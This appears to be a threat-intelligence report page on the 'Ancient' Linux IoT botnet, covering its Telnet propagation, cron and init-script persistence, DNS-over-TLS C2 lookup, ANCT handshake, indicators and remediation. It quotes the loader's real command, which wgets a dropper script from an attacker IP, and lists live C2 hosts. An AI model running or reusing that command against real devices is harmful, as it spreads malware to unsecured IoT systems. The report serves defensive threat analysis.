Threat reportMalwareTL-2026-2955

"Ancient" Linux IoT botnet with custom ANCT C2 protocol (Telnet-spreading, DNS-over-TLS C2 resolution)

mediumACTIVE

"Ancient" Linux IoT botnet with custom ANCT C2 protocol (TL-2026-2955), also tracked as Ancient, is a medium-severity malware campaign, first published 2026-10-05. It has no confirmed attribution, affects Various Linux-based IoT/embedded devices exposing Telnet (ARM, maps to 15 MITRE ATT&CK techniques (T1021, T1037.004, T1049), and is covered by 9 detection rules and 24 indicators of compromise.

Severity
MEDIUMAssessed severity
CVEs
0None referenced
Techniques
15MITRE ATT&CK
Actors
0Not attributed
Detection rules
9SPL · KQL · Sigma
IOCs
24Indicators of compromise

Key facts for TL-2026-2955

Threat ID
TL-2026-2955
Also known as
Ancient, elf.ancient
Severity
MEDIUM
Status
ACTIVE
Category
MALWARE
First published
Last reviewed
Attribution confidence
LOW
Motivation
UNKNOWN
Target sectors
technology, telecoms, consumer-iot
Target regions
Global
Detection rules
9
Indicators of compromise
24

Malware and tooling in "Ancient" Linux IoT botnet with custom ANCT C2 protocol

Malware and tooling: Ancient, Mirai

How "Ancient" Linux IoT botnet with custom ANCT C2 protocol works

Ancient is a previously undocumented Linux IoT botnet (Malpedia elf.ancient) that spreads via Telnet from already-infected devices, persists through cron, rc.local, init.d and profile.d, resolves its C2 over DNS-over-TLS, and communicates over a custom ANCT protocol. First samples were observed on 2026-10-04.

Ancient is a Linux IoT botnet documented by Christophe Hubert (ksi-digital) on 2026-10-05 and catalogued by Malpedia as elf.ancient. The dropper, a shell script named persist.sh, ships 13 builds covering arm4-arm8, mips, mpsl, x86, x86_64, m68k, ppc and sh4.

Propagation is by Telnet: an already-infected device logs in to a target (the write-up reports empty-password root access, with probe routines testing for a working shell and busybox) and runs a command of the form 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.163.157.131:8080/persist.sh'. The target reports a status string back: ANCIENT_STARTED, ANCIENT_NOCONN, ANCIENT_SKIP or ANCIENT_FAIL.

The dropper installs persistence in several places: a cron entry running every 5 minutes (including /etc/crontab and /var/spool/cron/root), rc.local, /etc/init.d/.ancient and, from dropper v3, /etc/profile.d/.ancient.sh. The bot binary uses the hidden filename .ancient. Three dropper versions (2802 B, 3380 B, 5952 B) and two x86-64 bot builds (2026-10-04 15:37 and 19:09 UTC) were observed.

The bot stays dormant while being ptraced, so no network activity occurs under a debugger. It resolves its C2 domain zyrec2.duckdns.org over DNS-over-TLS to Cloudflare 1.1.1.1:853, which hides the lookup from port-53 monitoring. The C2 handshake on TCP/35342 is a custom ANCT protocol: the bot sends the 4-byte magic 'ANCT' (41 4E 43 54) plus 32 high-entropy bytes (ephemeral key exchange), the server replies with 36 high-entropy bytes, and the stream is encrypted thereafter. The compiled bot generates its C2 domain, port and ANCT tag at runtime, so static string signatures only apply to the dropper script; the ANCT magic is port-agnostic on the wire.

The payload server and C2 share one host (89.163.157.131, AS24961 myLoc/WIIT AG, Germany; payload on 8080, C2 on 35342). Telnet loader sources 94.154.43.138 (delivered Ancient) and 94.154.43.196 (delivered a Mirai kit) sit in AS219502. The source notes a shared loader routine with an unrelated Mirai variant from the same network range. No CVE is exploited, no actor is attributed and no impact beyond botnet recruitment is documented; severity is analyst-assigned.

MITRE ATT&CK techniques used in TL-2026-2955

Lateral Movement

T1021 Remote Services

Persistence

T1037.004 RC Scripts; T1053.003 Cron; T1546.004 Unix Shell Configuration Modification

Discovery

T1049 System Network Connections Discovery; T1082 System Information Discovery

Execution

T1059.004 Unix Shell

Command and Control

T1071.004 DNS; T1095 Non-Application Layer Protocol; T1568 Dynamic Resolution; T1571 Non-Standard Port; T1573 Encrypted Channel

Initial Access

T1078.001 Default Accounts

Defense Evasion

T1564.001 Hidden Files and Directories; T1622 Debugger Evasion

Affected products and versions in "Ancient" Linux IoT botnet with custom ANCT C2 protocol

  • Various — Linux-based IoT/embedded devices exposing Telnet (ARM arm4-arm8, MIPS, x86, x86_64, m68k, PowerPC, sh4)
    Vulnerable versions: Devices with Telnet enabled and empty or weak root credentials

Remediation for "Ancient" Linux IoT botnet with custom ANCT C2 protocol

Immediate actions

  • Block egress and ingress to 89.163.157.131 (ports 8080 and 35342) and the Telnet loader sources 94.154.43.138, 94.154.43.196 and 77.239.124.121
  • Sinkhole or block zyrec2.duckdns.org and alert on outbound DNS-over-TLS (TCP/853) from IoT/embedded segments
  • Alert on TCP payloads whose first four bytes are 'ANCT' (41 4E 43 54), regardless of port
  • Hunt for /etc/init.d/.ancient, /etc/profile.d/.ancient.sh, .ancient binaries and persist.sh in /tmp, /var/run, /mnt and /root

Workarounds

  • Block TCP/23 inbound from the internet and between internal segments
  • Remove the cron, rc.local, init.d and profile.d entries that reference .ancient, then reboot and re-image if the device cannot be verified clean

Longer-term hardening

  • Disable Telnet on IoT/embedded devices; use SSH with key-based auth
  • Eliminate empty and default credentials on all devices
  • Segment IoT devices and restrict their egress to required destinations only

Weaknesses (CWE) in "Ancient" Linux IoT botnet with custom ANCT C2 protocol

CWE-1392

Timeline of "Ancient" Linux IoT botnet with custom ANCT C2 protocol

  • AS219502 (STORMCLOUD-AS, Storm Industries LLC), hosting the Ancient and Mirai Telnet loaders (94.154.43.0/24, 176.65.139.0/24), announced; zyrec2.duckdns.org has been listed in ThreatFox as a Mirai C2 since 2026-06
  • Mirai C2 176.65.139.196:18129, from the same network range as the Ancient loader but an unrelated variant, listed
  • persist.sh v3 (5952 B) served at 19:09 UTC with filesystem-durability scoring, a port byte-order fix and profile.d persistence; x86-64 bot rebuilt (SHA-256 748f50d4...)
  • persist.sh v2 (3380 B) served in the afternoon, adding a duplicate-instance guard
  • Infected device 94.154.43.138 Telnet-infected a honeypot at 15:37 UTC; dropper persist.sh v1 (2802 B) and the first x86-64 bot (SHA-256 6c44cbf5...) were fetched from 89.163.157.131:8080
  • Probe-only Telnet source 77.239.124.121 (AS198364) hit the honeypot at 00:31 UTC using the same loader probe routine
  • Christophe Hubert (ksi-digital) published the Ancient botnet write-up with IOCs and YARA, Suricata and Sigma detections
  • Loader 94.154.43.196 delivered an unrelated Mirai kit at 12:58 UTC using the same Telnet routine as Ancient
  • C2 at 89.163.157.131:35342 confirmed live in a controlled 10-minute window (02:01-02:11 UTC); ANCT handshake documented and the bot uploaded about 1.79 MB with no tasking from the server
  • C2 89.163.157.131:35342 reported to ThreatFox and the IP to Spamhaus (~01:50 UTC); myLoc abuse contact notified
  • Sandbox runs showed no network activity while ptrace-traced (01:09 UTC); untraced (01:36 UTC) the bot resolved the C2 over DoT and made 33 connection attempts, blocked
  • Malpedia entry elf.ancient added (library entry dated 2026-10-05; the write-up records the entry as added 2026-10-06)

Sources cited for "Ancient" Linux IoT botnet with custom ANCT C2 protocol

Detection coverage for TL-2026-2955

As of 2026-10-05, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-2955 across Splunk SPL, Microsoft KQL and Sigma, covering 24 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
24 indicators of compromise · Red and above. Compare plans

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats